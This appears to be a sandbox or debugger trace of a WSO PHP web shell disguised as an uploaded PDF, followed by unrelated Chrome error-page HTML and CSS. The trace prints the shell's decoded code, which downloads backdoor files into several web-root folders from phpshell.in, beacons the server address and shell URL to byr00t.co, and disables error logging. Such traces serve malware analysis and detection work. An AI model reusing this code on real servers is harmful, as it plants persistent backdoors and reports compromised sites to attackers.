http_get(\'http://phpshell.in/txt/phpinfo.txt\');\r\n$open1234567891011121314151617 = fopen($check1234567891011121314151617, \'w\');\r\nfwrite($open1234567891011121314151617, $text1234567891011121314151617);\r\nfclose($open1234567891011121314151617);\r\nif(file_exists($check1234567891011121314151617)){\r\n}\r\n$check123456789101112131415161718 = $_SERVER[\'DOCUMENT_ROOT\'] . "/.well-known/css.php" ;\r\n$textk123456789101112131415161718 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk123456789101112131415161718 = fopen($checkk123456789101112131415161718, \'w\');\r\nfwrite($openk123456789101112131415161718, $textk123456789101112131415161718);\r\nfclose($openk123456789101112131415161718);\r\nif(file_exists($checkk123456789101112131415161718)){\r\n}\r\n$checkk12345678910111213141516171819 = $_SERVER[\'DOCUMENT_ROOT\'] . "/sites/css.php" ;\r\n$text12345678910111213141516171819 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516171819 = fopen($check12345678910111213141516171819, \'w\');\r\nfwrite($open12345678910111213141516171819, $text12345678910111213141516171819);\r\nfclose($open12345678910111213141516171819);\r\nif(file_exists($check12345678910111213141516171819)){\r\n}\r\n$check1234567891011121314151617181920 = $_SERVER[\'DOCUMENT_ROOT\'] . "/tmp/css.php" ;\r\n$text1234567891011121314151617181920 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314151617181920 = fopen($check1234567891011121314151617181920, \'w\');\r\nfwrite($open1234567891011121314151617181920, $text1234567891011121314151617181920);\r\nfclose($open1234567891011121314151617181920);\r\nif(file_exists($check1234567891011121314151617181920)){\r\n}\r\n?>\r\n'	/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code	1	0
4	13	0	0.008003	1143856	base64_decode	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	16	1	'aHR0cDovL2J5cjAwdC5jby9sLQ=='
4	13	1	0.008024	1143944
4	13	R			'http://byr00t.co/l-'
4	14	0	0.008041	1143912	GetIP	1		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	16	0
5	15	0	0.008056	1143912	getenv	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	3	1	'HTTP_CLIENT_IP'
5	15	1	0.008072	1143944
5	15	R			FALSE
5	16	0	0.008087	1143912	getenv	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	5	1	'HTTP_X_FORWARDED_FOR'
5	16	1	0.008102	1143944
5	16	R			FALSE
5	17	0	0.008115	1143912	getenv	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	12	1	'REMOTE_ADDR'
5	17	1	0.008131	1143984
5	17	R			'127.0.0.1'
4		A						/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	12	$ip = '127.0.0.1'
4	14	1	0.008161	1143952
4	14	R			'127.0.0.1'
4	18	0	0.008176	1143976	base64_encode	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	16	1	'http://localhost/uploads/wso1.php.PDF'
4	18	1	0.008193	1144104
4	18	R			'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLlBERg=='
3		A						/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	16	$x = 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLlBERg=='
4	19	0	0.008227	1143968	function_exists	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	17	1	'curl_init'
4	19	1	0.008243	1144008
4	19	R			TRUE
4	20	0	0.008257	1143968	curl_init	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	19	0
4	20	1	0.008289	1144880
4	20	R			resource(3) of type (curl)
3		A						/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	19	$ch = resource(3) of type (curl)
4	21	0	0.008318	1144880	curl_setopt	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	10002	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLlBERg=='
4	21	1	0.008339	1144976
4	21	R			TRUE
4	22	0	0.008353	1144880	curl_setopt	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	19913	TRUE
4	22	1	0.008412	1144976
4	22	R			TRUE
4	23	0	0.008427	1144880	curl_exec	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	23	1	0.051570	1144912
4	23	R			''
3		A						/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	19	$gitt = ''
4	24	0	0.051644	1144880	curl_close	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	24	1	0.051722	1144024
4	24	R			NULL
4	25	0	0.051741	1143992	file_get_contents	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	21	1	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLlBERg=='
4	25	1	0.671137	1147704
4	25	R			''
3		A						/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	21	$gitt = ''
3		A						/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	26	$auth_pass = 'a6d13df8a46cf713e5cda6a6c0d043bf'
3		A						/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	27	$color = '#00ff66'
3		A						/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	28	$default_action = 'FilesMan'
4	26	0	0.671304	1147664	define	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	29	2	'SELF_PATH'	'/var/www/html/uploads/wso1.php.PDF(4) : eval()\'d code(1) : eval()\'d code'
4	26	1	0.671335	1147768
4	26	R			TRUE
4	27	0	0.671367	1147696	strpos	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	30	2	'python-requests/2.25.1'	'Google'
4	27	1	0.671384	1147768
4	27	R			FALSE
4	28	0	0.671422	1147696	session_start	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	32	0
4	28	1	0.671507	1148448
4	28	R			TRUE
4	29	0	0.671523	1148448	error_reporting	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	33	1	0
4	29	1	0.671538	1148488
4	29	R			0
4	30	0	0.671552	1148448	ini_set	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	34	2	'error_log'	NULL
4	30	1	0.671568	1148520
4	30	R			''
4	31	0	0.671581	1148448	ini_set	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	35	2	'display_errors'	0
4	31	1	0.671596	1148520
4	31	R			''
4	32	0	0.671610	1148448	ini_set	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	36	2	'log_errors'	0
4	32	1	0.671624	1148520
4	32	R			'1'
4	33	0	0.671637	1148448	ini_set	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	37	2	'max_execution_time'	0
4	33	1	0.671654	1148552
4	33	R			'30'
4	34	0	0.671667	1148448	set_time_limit	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	38	1	0
4	34	1	0.671682	1148512
4	34	R			FALSE
3	12	1	0.671706	1149960
2	7	1	0.671724	1062936
1	3	1	0.671732	1061360
1	35	0	0.671739	1061392	Error->__toString	0		Unknown	0	0
2	36	0	0.671752	1061472	Error->getTraceAsString	0		Unknown	0	0
2	36	1	0.671765	1061728
2	36	R			'#0 /var/www/html/uploads/wso1.php.PDF(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso1.php.PDF(4): eval()\n#2 {main}'
1	35	1	0.671785	1065864
1	35	R			'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/wso1.php.PDF(4) : eval()\'d code(1) : eval()\'d code:39\nStack trace:\n#0 /var/www/html/uploads/wso1.php.PDF(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso1.php.PDF(4): eval()\n#2 {main}'
			0.671840	986352
TRACE END   [2023-02-13 00:45:05.844329]


Generated HTML code

<html dir="ltr" lang="en"><head>
  <meta charset="utf-8">
  <meta name="color-scheme" content="light dark">
  <meta name="theme-color" content="#fff">
  <meta name="viewport" content="width=device-width, initial-scale=1.0,
                                 maximum-scale=1.0, user-scalable=no">
  <title>localhost</title>
  <style>/* Copyright 2017 The Chromium Authors
 * Use of this source code is governed by a BSD-style license that can be
 * found in the LICENSE file. */

a {
  color: var(--link-color);
}

body {
  --background-color: #fff;
  --error-code-color: var(--google-gray-700);
  --google-blue-100: rgb(210, 227, 252);
  --google-blue-300: rgb(138, 180, 248);
  --google-blue-600: rgb(26, 115, 232);
  --google-blue-700: rgb(25, 103, 210);
  --google-gray-100: rgb(241, 243, 244);
  --google-gray-300: rgb(218, 220, 224);
  --google-gray-500: rgb(154, 160, 166);
  --google-gray-50: rgb(248, 249, 250);
  --google-gray-600: rgb(128, 134, 139);
  --google-gray-700: rgb(95, 99, 104);
  --google-gray-800: rgb(60, 64, 67);
  --google-gray-900: rgb(32, 33, 36);
  --heading-color: var(--google-gray-900);
  --link-color: rgb(88, 88, 88);
  --popup-container-background-color: rgba(0,0,0,.65);
  --primary-button-fill-color-active: var(--google-blue-700);
  --primary-button-fill-color: var(--google-blue-600);
  --primary-button-text-color: #fff;
  --quiet-background-color: rgb(247, 247, 247);
  --secondary-button-border-color: var(--google-gray-500);
  --secondary-button-fill-color: #fff;
  --secondary-button-hover-border-color: var(--google-gray-600);
  --secondary-button-hover-fill-color: var(--google-gray-50);
  --secondary-button-text-color: var(--google-gray-700);
  --small-link-color: var(--google-gray-700);
  --text-color: var(--google-gray-700);
  background: var(--background-color);
  color: var(--text-color);
  word-wrap: break-word;
}

.nav-wrapper .secondary-button {
  background: var(--secondary-button-fill-color);
  border: 1px solid var(--secondary-button-border-color);
  color: var(--secondary-button-text-color);
  float: none;
  margin: 0;
  padding: 8px 16px;
}

.hidden {
  display: none;
}

html {
  -webkit-text-size-adjust: 100%;
  font-size: 125%;
}

.icon {
  background-repeat: no-repeat;
  background-size: 100%;
}

@media (prefers-color-scheme: dark) {
  body {
    --background-color: var(--google-gray-900);
    --error-code-color: var(--google-gray-500);
    --heading-color: var(--google-gray-500);
    --link-color: var(--google-blue-300);
    --primary-button-fill-color-active: rgb(129, 162, 208);
    --primary-button-fill-color: var(--google-blue-300);
    --primary-button-text-color: var(--google-gray-900);
    --quiet-background-color: var(--background-color);
    --secondary-button-border-color: var(--google-gray-700);
    --secondary-button-fill-color: var(--google-gray-900);
    --secondary-button-hover-fill-color: rgb(48, 51, 57);
    --secondary-button-text-color: var(--google-blue-300);
    --small-link-color: var(--google-blue-300);
    --text-color: var(--google-gray-500);
  }
}
</style>
  <style>/* Copyright 2014 The Chromium Authors
   Use of this source code is governed by a BSD-style license that can be
   found in the LICENSE file. */

button {
  border: 0;
  border-radius: 4px;
  box-sizing: border-box;
  color: var(--primary-button-text-color);
  cursor: pointer;
  float: right;
  font-size: .875em;
  margin: 0;
  padding: 8px 16px;
  transition: box-shadow 150ms cubic-bezier(0.4, 0, 0.2, 1);
  user-select: none;
}

[dir='rtl'] button {
  float: left;
}

.bad-clock button,
.captive-portal button,
.https-only button,
.insecure-form button,
.lookalike-url button,
.main-frame-blocked button,
.neterror button,
.pdf button,
.ssl button,
.enterprise-block button,
.enterprise-warn button,
.safe-browsing-billing button {
  background: var(--primary-button-fill-color);
}

button:active {
  background: var(--primary-button-fill-color-active);
  outline: 0;
}

#debugging {
  display: inline;
  overflow: auto;
}

.debugging-content {
  line-height: 1em;
  margin-bottom: 0;
  margin-top: 1em;
}

.debugging-content-fixed-width {
  display: block;
  font-family: monospace;
  font-size: 1.2em;
  margin-top: 0.5em;
}

.debugging-title {
  font-weight: bold;
}

#details {
  margin: 0 0 50px;
}

#details p:not(:first-of-type) {
  margin-top: 20px;
}

.secondary-button:active {
  border-color: white;
  box-shadow: 0 1px 2px 0 rgba(60, 64, 67, .3),
      0 2px 6px 2px rgba(60, 64, 67, .15);
}

.secondary-button:hover {
  background: var(--secondary-button-hover-fill-color);
  border-color: var(--secondary-button-hover-border-color);
  text-decoration: none;
}

.error-code {
  color: var(--error-code-color);
  font-size: .8em;
  margin-top: 12px;
  text-transform: uppercase;
}

#error-debugging-info {
  font-size: 0.8em;
}

h1 {
  color: var(--heading-color);
  font-size: 1.6em;
  font-weight: normal;
  line-height: 1.25em;
  margin-bottom: 16px;
}

h2 {
  font-size: 1.2em;
  font-weight: normal;
}

.icon {
  height: 72px;
  margin: 0 0 40px;
  width: 72px;
}

input[type=checkbox] {
  opacity: 0;
}

input[type=checkbox]:focus ~ .checkbox::after {
  outline: -webkit-focus-ring-color auto 5px;
}

.interstitial-wrapper {
  box-sizing: border-box;
  font-size: 1em;
  line-height: 1.6em;
  margin: 14vh auto 0;
  max-width: 600px;
  width: 100%;
}

#main-message > p {
  display: inline;
}

#extended-reporting-opt-in {
  font-size: .875em;
  margin-top: 32px;
}

#extended-reporting-opt-in label {
  display: grid;
  grid-template-columns: 1.8em 1fr;
  position: relative;
}

#enhanced-protection-message {
  border-radius: 4px;
  font-size: 1em;
  margin-top: 32px;
  padding: 10px 5px;
}

#enhanced-protection-message label {
  display: grid;
  grid-template-columns: 2.5em 1fr;
  position: relative;
}

#enhanced-protection-message div {
  margin: 0.5em;
}

#enhanced-protection-message .icon {
  height: 1.5em;
  vertical-align: middle;
  width: 1.5em;
}

.nav-wrapper {
  margin-top: 51px;
}

.nav-wrapper::after {
  clear: both;
  content: '';
  display: table;
  width: 100%;
}

.small-link {
  color: var(--small-link-color);
  font-size: .875em;
}

.checkboxes {
  flex: 0 0 24px;
}

.checkbox {
  --padding: .9em;
  background: transparent;
  display: block;
  height: 1em;
  left: -1em;
  padding-inline-start: var(--padding);
  position: absolute;
  right: 0;
  top: -.5em;
  width: 1em;
}

.checkbox::after {
  border: 1px solid white;
  border-radius: 2px;
  content: '';
  height: 1em;
  left: var(--padding);
  position: absolute;
  top: var(--padding);
  width: 1em;
}

.checkbox::before {
  background: transparent;
  border: 2px solid white;
  border-inline-end-width: 0;
  border-top-width: 0;
  content: '';
  height: .2em;
  left: calc(.3em + var(--padding));
  opacity: 0;
  position: absolute;
  top: calc(.3em  + var(--padding));
  transform: rotate(-45deg);
  width: .5em;
}

input[type=checkbox]:checked ~ .checkbox::before {
  opacity: 1;
}

#recurrent-error-message {
  background: #ededed;
  border-radius: 4px;
  margin-bottom: 16px;
  margin-top: 12px;
  padding: 12px 16px;
}

.showing-recurrent-error-message #extended-reporting-opt-in {
  margin-top: 16px;
}

.showing-recurrent-error-message #enhanced-protection-message {
  margin-top: 16px;
}

@media (max-width: 700px) {
  .interstitial-wrapper {
    padding: 0 10%;
  }

  #error-debugging-info {
    overflow: auto;
  }
}

@media (max-width: 420px) {
  button,
  [dir='rtl'] button,
  .small-link {
    float: none;
    font-size: .825em;
    font-weight: 500;
    margin: 0;
    width: 100%;
  }

  button {
    padding: 16px 24px;
  }

  #details {
    margin: 20px 0 20px 0;
  }

  #details p:not(:first-of-type) {
    margin-top: 10px;
  }

  .secondary-button:not(.hidden) {
    display: block;
    margin-top: 20px;
    text-align: center;
    width: 100%;
  }

  .interstitial-wrapper {
    padding: 0 5%;
  }

  #extended-reporting-opt-in {
    margin-top: 24px;
  }

  #enhanced-protection-message {
    margin-top: 24px;
  }

  .nav-wrapper {
    margin-top: 30px;
  }
}

/**
 * Mobile specific styling.
 * Navigation buttons are anchored to the bottom of the screen.
 * Details message replaces the top content in its own scrollable area.
 */

@media (max-width: 420px) {
  .nav-wrapper .secondary-button {
    border: 0;
    margin: 16px 0 0;
    margin-inline-end: 0;
    padding-bottom: 16px;
    padding-top: 16px;
  }
}

/* Fixed nav. */
@media (min-width: 240px) and (max-width: 420px) and
       (min-height: 401px),
       (min-width: 421px) and (min-height: 240px) and
       (max-height: 560px) {
  body .nav-wrapper {
    background: var(--background-color);
    bottom: 0;
    box-shadow: 0 -12px 24px var(--background-color);
    left: 0;
    margin: 0 auto;
    max-width: 736px;
    padding-inline-end: 24px;
    padding-inline-start: 24px;
    position: fixed;
    right: 0;
    width: 100%;
    z-index: 2;
  }

  .interstitial-wrapper {
    max-width: 736px;
  }

  #details,
  #main-content {
    padding-bottom: 40px;
  }

  #details {
    padding-top: 5.5vh;
  }

  button.small-link {
    color: var(--google-blue-600);
  }
}

@media (max-width: 420px) and (orientation: portrait),
       (max-height: 560px) {
  body {
    margin: 0 auto;
  }

  button,
  [dir='rtl'] button,
  button.small-link,
  .nav-wrapper .secondary-button {
    font-family: Roboto-Regular,Helvetica;
    font-size: .933em;
    margin: 6px 0;
    transform: translatez(0);
  }

  .nav-wrapper {
    box-sizing: border-box;
    padding-bottom: 8px;
    width: 100%;
  }

  #details {
    box-sizing: border-box;
    height: auto;
    margin: 0;
    opacity: 1;
    transition: opacity 250ms cubic-bezier(0.4, 0, 0.2, 1);
  }

  #details.hidden,
  #main-content.hidden {
    height: 0;
    opacity: 0;
    overflow: hidden;
    padding-bottom: 0;
    transition: none;
  }

  h1 {
    font-size: 1.5em;
    margin-bottom: 8px;
  }

  .icon {
    margin-bottom: 5.69vh;
  }

  .interstitial-wrapper {
    box-sizing: border-box;
    margin: 7vh auto 12px;
    padding: 0 24px;
    position: relative;
  }

  .interstitial-wrapper p {
    font-size: .95em;
    line-height: 1.61em;
    margin-top: 8px;
  }

  #main-content {
    margin: 0;
    transition: opacity 100ms cubic-bezier(0.4, 0, 0.2, 1);
  }

  .small-link {
    border: 0;
  }

  .suggested-left > #control-buttons,
  .suggested-right > #control-buttons {
    float: none;
    margin: 0;
  }
}

@media (min-width: 421px) and (min-height: 500px) and (max-height: 560px) {
  .interstitial-wrapper {
    margin-top: 10vh;
  }
}

@media (min-height: 400px) and (orientation:portrait) {
  .interstitial-wrapper {
    margin-bottom: 145px;
  }
}

@media (min-height: 299px) {
  .nav-wrapper {
    padding-bottom: 16px;
  }
}

@media (max-height: 560px) and (min-height: 240px) and (orientation:landscape) {
  .extended-reporting-has-checkbox #details {
    padding-bottom: 80px;
  }
}

@media (min-height: 500px) and (max-height: 650px) and (max-width: 414px) and
       (orientation: portrait) {
  .interstitial-wrapper {
    margin-top: 7vh;
  }
}

@media (min-height: 650px) and (max-width: 414px) and (orientation: portrait) {
  .interstitial-wrapper {
    margin-top: 10vh;
  }
}

/* Small mobile screens. No fixed nav. */
@media (max-height: 400px) and (orientation: portrait),
       (max-height: 239px) and (orientation: landscape),
       (max-width: 419px) and (max-height: 399px) {
  .interstitial-wrapper {
    display: flex;
    flex-direction: column;
    margin-bottom: 0;
  }

  #details {
    flex: 1 1 auto;
    order: 0;
  }

  #main-content {
    flex: 1 1 auto;
    order: 0;
  }

  .nav-wrapper {
    flex: 0 1 auto;
    margin-top: 8px;
    order: 1;
    padding-inline-end: 0;
    padding-inline-start: 0;
    position: relative;
    width: 100%;
  }

  button,
  .nav-wrapper .secondary-button {
    padding: 16px 24px;
  }

  button.small-link {
    color: var(--google-blue-600);
  }
}

@media (max-width: 239px) and (orientation: portrait) {
  .nav-wrapper {
    padding-inline-end: 0;
    padding-inline-start: 0;
  }
}
</style>
  <style>/* Copyright 2013 The Chromium Authors
 * Use of this source code is governed by a BSD-style license that can be
 * found in the LICENSE file. */

/* Don't use the main frame div when the error is in a subframe. */
html[subframe] #main-frame-error {
  display: none;
}

/* Don't use the subframe error div when the error is in a main frame. */
html:not([subframe]) #sub-frame-error {
  display: none;
}

h1 {
  margin-top: 0;
  word-wrap: break-word;
}

h1 span {
  font-weight: 500;
}

a {
  text-decoration: none;
}

.icon {
  -webkit-user-select: none;
  display: inline-block;
}

.icon-generic {
  /* Can't access chrome://theme/IDR_ERROR_NETWORK_GENERIC from an untrusted
   * renderer process, so embed the resource manually. */
  content: -webkit-image-set(
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEgAAABIAQMAAABvIyEEAAAABlBMVEUAAABTU1OoaSf/AAAAAXRSTlMAQObYZgAAAENJREFUeF7tzbEJACEQRNGBLeAasBCza2lLEGx0CxFGG9hBMDDxRy/72O9FMnIFapGylsu1fgoBdkXfUHLrQgdfrlJN1BdYBjQQm3UAAAAASUVORK5CYII=) 1x,
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJAAAACQAQMAAADdiHD7AAAABlBMVEUAAABTU1OoaSf/AAAAAXRSTlMAQObYZgAAAFJJREFUeF7t0cENgDAMQ9FwYgxG6WjpaIzCCAxQxVggFuDiCvlLOeRdHR9yzjncHVoq3npu+wQUrUuJHylSTmBaespJyJQoObUeyxDQb3bEm5Au81c0pSCD8HYAAAAASUVORK5CYII=) 2x);
}

.icon-offline {
  content: -webkit-image-set(
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEgAAABIAQMAAABvIyEEAAAABlBMVEUAAABTU1OoaSf/AAAAAXRSTlMAQObYZgAAAGxJREFUeF7tyMEJwkAQRuFf5ipMKxYQiJ3Z2nSwrWwBA0+DQZcdxEOueaePp9+dQZFB7GpUcURSVU66yVNFj6LFICatThZB6r/ko/pbRpUgilY0Cbw5sNmb9txGXUKyuH7eV25x39DtJXUNPQGJtWFV+BT/QAAAAABJRU5ErkJggg==) 1x,
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJAAAACQBAMAAAAVaP+LAAAAGFBMVEUAAABTU1NNTU1TU1NPT09SUlJSUlJTU1O8B7DEAAAAB3RSTlMAoArVKvVgBuEdKgAAAJ1JREFUeF7t1TEOwyAMQNG0Q6/UE+RMXD9d/tC6womIFSL9P+MnAYOXeTIzMzMzMzMzaz8J9Ri6HoITmuHXhISE8nEh9yxDh55aCEUoTGbbQwjqHwIkRAEiIaG0+0AA9VBMaE89Rogeoww936MQrWdBr4GN/z0IAdQ6nQ/FIpRXDwHcA+JIJcQowQAlFUA0MfQpXLlVQfkzR4igS6ENjknm/wiaGhsAAAAASUVORK5CYII=) 2x);
  position: relative;
}

.icon-disabled {
  content: -webkit-image-set(
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAHAAAABICAMAAAAZF4G5AAAABlBMVEVMaXFTU1OXUj8tAAAAAXRSTlMAQObYZgAAASZJREFUeAHd11Fq7jAMRGGf/W/6PoWB67YMqv5DybwG/CFjRuR8JBw3+ByiRjgV9W/TJ31P0tBfC6+cj1haUFXKHmVJo5wP98WwQ0ZCbfUc6LQ6VuUBz31ikADkLMkDrfUC4rR6QGW+gF6rx7NaHWCj1Y/W6lf4L7utvgBSt3rBFSS/XBMPUILcJINHCBWYUfpWn4NBi1ZfudIc3rf6/NGEvEA+AsYTJozmXemjXeLZAov+mnkN2HfzXpMSVQDnGw++57qNJ4D1xitA2sJ+VAWMygSEaYf2mYPTjZfk2K8wmP7HLIH5Mg4/pP+PEcDzUvDMvYbs/2NWwPO5vBdMZE4EE5UTQLiBFDaUlTDPBRoJ9HdAYIkIo06og3BNXtCzy7zA1aXk5x+tJARq63eAygAAAABJRU5ErkJggg==) 1x,
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAOAAAACQAQMAAAArwfVjAAAABlBMVEVMaXFTU1OXUj8tAAAAAXRSTlMAQObYZgAAAYdJREFUeF7F1EFqwzAUBNARAmVj0FZe5QoBH6BX+dn4GlY2PYNzGx/A0CvkCIJuvIraKJKbgBvzf2g62weDGD7CYggpfFReis4J0ey9EGFIiEQQojFSlA9kSIiqd0KkFjKsewgRbStEN19mxUPTtmW9HQ/h6tyqNQ8NlSMZdzyE6qkoE0trVYGFm0n1WYeBhduzwbwBC7voS+vIxfeMjeaiLxsMMtQNwMPtuew+DjzcTHk8YMfDknEcIUOtf2lVfgVH3K4Xv5PRYAXRVMtItIJ3rfaCIVn9DsTH2NxisAVRex2Hh3hX+/mRUR08bAwPEYsI51ZxWH4Q0SpicQRXeyEaIug48FEdegARfMz/tADVsRciwTAxW308ehmC2gLraC+YCbV3QoTZexa+zegAEW5PhhgYfmbvJgcRqngGByOSXdFJcLk2JeDPEN0kxe1JhIt5FiFA+w+ItMELsUyPF2IaJ4aILqb4FbxPwhImwj6JauKgDUCYaxmYIsd4KXdMjIC9ItB5Bn4BNRwsG0XM2nwAAAAASUVORK5CYII=) 2x);
  width: 112px;
}

.hidden {
  display: none;
}

#suggestions-list a {
  color: var(--google-blue-600);
}

#suggestions-list p {
  margin-block-end: 0;
}

#suggestions-list ul {
  margin-top: 0;
}

.single-suggestion {
  list-style-type: none;
  padding-inline-start: 0;
}

#error-information-button {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBmaWxsPSJub25lIiBkPSJNMCAwaDI0djI0SDB6Ii8+PHBhdGggZD0iTTExIDE4aDJ2LTJoLTJ2MnptMS0xNkM2LjQ4IDIgMiA2LjQ4IDIgMTJzNC40OCAxMCAxMCAxMCAxMC00LjQ4IDEwLTEwUzE3LjUyIDIgMTIgMnptMCAxOGMtNC40MSAwLTgtMy41OS04LThzMy41OS04IDgtOCA4IDMuNTkgOCA4LTMuNTkgOC04IDh6bTAtMTRjLTIuMjEgMC00IDEuNzktNCA0aDJjMC0xLjEuOS0yIDItMnMyIC45IDIgMmMwIDItMyAxLjc1LTMgNWgyYzAtMi4yNSAzLTIuNSAzLTUgMC0yLjIxLTEuNzktNC00LTR6Ii8+PC9zdmc+);
  height: 24px;
  vertical-align: -.15em;
  width: 24px;
}

.use-popup-container#error-information-popup-container
  #error-information-popup {
  align-items: center;
  background-color: var(--popup-container-background-color);
  display: flex;
  height: 100%;
  left: 0;
  position: fixed;
  top: 0;
  width: 100%;
  z-index: 100;
}

.use-popup-container#error-information-popup-container
  #error-information-popup-content > p {
  margin-bottom: 11px;
  margin-inline-start: 20px;
}

.use-popup-container#error-information-popup-container #suggestions-list ul {
  margin-inline-start: 15px;
}

.use-popup-container#error-information-popup-container
  #error-information-popup-box {
  background-color: var(--background-color);
  left: 5%;
  padding-bottom: 15px;
  padding-top: 15px;
  position: fixed;
  width: 90%;
  z-index: 101;
}

.use-popup-container#error-information-popup-container div.error-code {
  margin-inline-start: 20px;
}

.use-popup-container#error-information-popup-container #suggestions-list p {
  margin-inline-start: 20px;
}

:not(.use-popup-container)#error-information-popup-container
  #error-information-popup-close {
  display: none;
}

#error-information-popup-close {
  margin-bottom: 0;
  margin-inline-end: 35px;
  margin-top: 15px;
  text-align: end;
}

.link-button {
  color: rgb(66, 133, 244);
  display: inline-block;
  font-weight: bold;
  text-transform: uppercase;
}

#sub-frame-error-details {

  color: #8F8F8F;

  /* Not done on mobile for performance reasons. */
  text-shadow: 0 1px 0 rgba(255,255,255,0.3);

}

[jscontent=hostName],
[jscontent=failedUrl] {
  overflow-wrap: break-word;
}

.secondary-button {
  background: #d9d9d9;
  color: #696969;
  margin-inline-end: 16px;
}

.snackbar {
  background: #323232;
  border-radius: 2px;
  bottom: 24px;
  box-sizing: border-box;
  color: #fff;
  font-size: .87em;
  left: 24px;
  max-width: 568px;
  min-width: 288px;
  opacity: 0;
  padding: 16px 24px 12px;
  position: fixed;
  transform: translateY(90px);
  will-change: opacity, transform;
  z-index: 999;
}

.snackbar-show {
  -webkit-animation:
    show-snackbar 250ms cubic-bezier(0, 0, 0.2, 1) forwards,
    hide-snackbar 250ms cubic-bezier(0.4, 0, 1, 1) forwards 5s;
}

@-webkit-keyframes show-snackbar {
  100% {
    opacity: 1;
    transform: translateY(0);
  }
}

@-webkit-keyframes hide-snackbar {
  0% {
    opacity: 1;
    transform: translateY(0);
  }
  100% {
    opacity: 0;
    transform: translateY(90px);
  }
}

.suggestions {
  margin-top: 18px;
}

.suggestion-header {
  font-weight: bold;
  margin-bottom: 4px;
}

.suggestion-body {
  color: #777;
}

/* Decrease padding at low sizes. */
@media (max-width: 640px), (max-height: 640px) {
  h1 {
    margin: 0 0 15px;
  }
  .suggestions {
    margin-top: 10px;
  }
  .suggestion-header {
    margin-bottom: 0;
  }
}

#download-link,
#download-link-clicked {
  margin-bottom: 30px;
  margin-top: 30px;
}

#download-link-clicked {
  color: #BBB;
}

#download-link::before,
#download-link-clicked::before {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxLjJlbSIgaGVpZ2h0PSIxLjJlbSIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNNSAyMGgxNHYtMkg1bTE0LTloLTRWM0g5djZINWw3IDcgNy03eiIgZmlsbD0iIzQyODVGNCIvPjwvc3ZnPg==);
  display: inline-block;
  margin-inline-end: 4px;
  vertical-align: -webkit-baseline-middle;
}

#download-link-clicked::before {
  opacity: 0;
  width: 0;
}

#offline-content-list-visibility-card {
  border: 1px solid white;
  border-radius: 8px;
  display: flex;
  font-size: .8em;
  justify-content: space-between;
  line-height: 1;
}

#offline-content-list.list-hidden #offline-content-list-visibility-card {
